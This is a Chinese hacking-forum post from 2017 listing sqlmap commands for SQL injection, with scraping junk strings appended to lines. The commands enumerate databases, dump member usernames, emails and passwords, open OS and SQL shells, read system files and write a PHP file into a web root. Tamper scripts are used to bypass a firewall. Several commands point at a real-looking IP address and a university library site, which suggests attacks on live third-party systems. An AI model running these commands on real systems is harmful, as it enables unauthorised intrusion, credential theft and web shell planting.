找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1855|回复: 0
打印 上一主题 下一主题

sqlmap使用实例

[复制链接]
跳转到指定楼层
楼主
发表于 2017-5-19 17:03:10 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
/pentest/database/sqlmap% L  ]8 ^, u) M0 ]& X

) m% E# Y8 b9 I' b! K! ~update :::::>     in the folder   after  execute    following   order : svn update% y( z# X5 I8 G$ b- N
  q1 q6 N% U7 Q; k" Z, |) _' X
sqlmap.py -r 1.txt --current-db$ @7 R& B' J$ D8 K1 A
* M2 W6 n' Y2 m% ], D! K  t
v 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”+ j; q* O4 X% l  x; O+ y* ^+ y

3 q+ I0 N$ @3 U1 w; S. v% b==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1))
) I, N9 G0 b- [7 M4 j: R猜解数据库
* t( j& t' s2 ~" l$ h7 L2 W./sqlmap.py -u "injection-url" --dbs
8 P% I+ w# p& p' F* psqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"
0 _, v. T9 R( z0 ^- L/ b! G$ ~- d! p
' B: p% u. l) g  [; y猜解表名: k+ C5 }- D% C7 f$ l9 d) r
./sqlmap.py -u "injection-url" -D database_name --tables
/ i1 E* Y7 L( }/ R6 F- V$ ~
4 E; T5 k5 a0 J  D$ F) L( `4 tsqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"
( t. l5 z- J& T/ L+ m7 vsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py" 9 w+ C* R0 u; V  D

% U6 M0 H5 Q, A+ Q+ u* J7 msqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump
2 S2 B+ ]: Z6 S' _: V' V  n' ]
* P/ c3 A& i1 {$ X4 P" o) }4 m$ }sqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"' b( Y4 `1 I* r0 a
sqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"
- q+ }1 g- T" ~. f" Fsqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py"
; e1 b# s/ B4 o* i/ psqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"3 H5 x/ T, T( [7 n

. j& _- a( N6 p: _( A% t$ dsqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"
+ Z& f% l% A7 ?. q! {) ksqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"% j" @& V  h, J+ O
sqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"- _5 W, k- b2 w% A, T% i
sqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py", x& H% ~9 u) K- `1 g, B5 A
sqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump2 j4 M% D+ Z; g; V3 `8 M$ D# l* v
  Z" v( S: s  o+ K# }# V
sqlmap.py -r 1.txt -v 3 --dbs  --batch --tamper "space2morehash.py" 绕过防火墙了  e/ ~& D7 {( `8 M
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"
2 @. W/ W9 z9 M2 ^, q% X, O% M" E6 L, E" t
sqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"5 V( y8 X' j" \5 Y
猜解列名7 h2 s! g3 S* o4 z
./sqlmap.py -u "injection-url" -D database_name -T table_name --columns! p+ f! j& c; r5 t8 B

6 W  B/ H+ l' M- @9 ^, Y) Ssqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py" 5 Q+ a2 }/ z" h4 h9 g
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py"
; D. u& L3 U$ E. t' e2 _sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"  u) g+ `# ?9 y
5 t- O7 f+ n7 O* `) R% ]
sqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"
4 t, F3 s; F$ V7 Q4 F&submit=Go; k8 i) n( c/ a
猜解值
: B( L# B8 ?$ C' _+ Z./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump
9 I7 Z7 ?0 d# L: M$ k' S========================================================
* T$ m6 z2 b, D& d; @" ^搜索表名中包括mana字符的
; Y$ }5 v5 I6 A: o. Y/ {/sqlmap.py -u "injection-url" -T mana --search9 [! o9 ~0 Z9 |. e4 Z. u% K; Z1 \
返回一个交互式sql shell
" U5 I% v; k& d/sqlmap.py -u "injection-url" --sql-shell
& Q, g+ z) N4 C7 j) A* n读取指定文件(需权限)6 G: b  q9 y1 [, N" G  }* N$ `
/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"
0 N9 X( G3 s3 j7 u查看当前 用户 及 数据库 + B9 z5 K6 B/ \# J  T* ?6 ^6 v! C
/sqlmap.py -u "injection-url" --current-user --current-db
( Y! Z: |( k  s& K* v  m本地文件 写入 远程目标绝对路径
  _, [6 \& o3 w  V' K: ]( q( z7 R/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径" ^$ y& Q8 H5 u6 K; f" o8 {1 i1 N
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py" . n4 |$ o* Y! @! }) A7 I# K0 N% w# d

  X4 [0 |% G8 [sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
0 @& Q: E7 }+ O' B4 u查看某用的权限
: p# |8 M* ^, @8 \& F: s/sqlmap.py -u "injection-url" --privileges -U root
8 P6 x' Q3 P) C1 @; b查看当前用户是否为dba
$ Y" J7 V1 t! m  Z/sqlmap.py -u "injection-url" --is-dba
  ~: |+ ]; u3 |) ~) \读取所有数据库用户或指定数据库用户的密码3 }, K" c0 K; [
sqlmap.py -r 1.txt --users --passwords4 O1 m+ U6 ~% K' @" j! f! u4 }# x
sqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py" ) l0 Z$ o4 @6 w) ?3 X1 ?
- b2 e* W5 x( Z+ M$ Z
/sqlmap.py -u "injection-url" --passwords -U root( @: j9 g' I! Y) u7 v2 F
3 m( O" s4 D" N( G& Y
--start&&--stop 与 --first&&--last 的区别" C. B5 `* \/ S" y2 k  I
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump   (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)) r; d* j3 P4 O. j4 Z, O
- K) E' r- ^  g+ M5 O2 u
从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt)
( u- ]3 Z% \+ E4 c( _% P% n/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables
- d" T5 L0 \& k0 ^/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns
$ ~* Z, A4 Z4 k/ |( ?8 D; n9 c  g0 Z4 i+ f* c7 u: ^  w- ^
执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……)% x2 ]% ^+ R( I3 P. b
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip") A% @( M/ C- S6 Z! Q
  w' X  B5 M1 z' k2 _: {* E# C
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表